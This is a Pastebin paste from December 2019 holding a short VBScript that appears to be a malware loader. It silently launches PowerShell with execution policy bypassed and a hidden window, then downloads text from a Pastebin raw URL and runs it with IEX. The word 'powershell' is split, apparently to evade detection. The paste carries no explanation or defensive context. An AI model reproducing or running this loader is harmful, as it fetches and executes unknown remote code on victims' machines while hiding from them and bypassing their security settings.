Advertisement
rgabriel

Untitled

Dec 4th, 2019
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.53 KB | None | 0 0
  1. const CONSOLE_HIDE=0
  2. const CONSOLE_SHOW=1
  3. const CMD_WAIT=true
  4. set oShell = wscript.createObject("WScript.Shell")
  5. oShell.run "cmd /c powers" & "hell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://pastebin.com/raw/tEJGYxQK');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; BasharBachir;", CONSOLE_HIDE, CMD_WAIT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement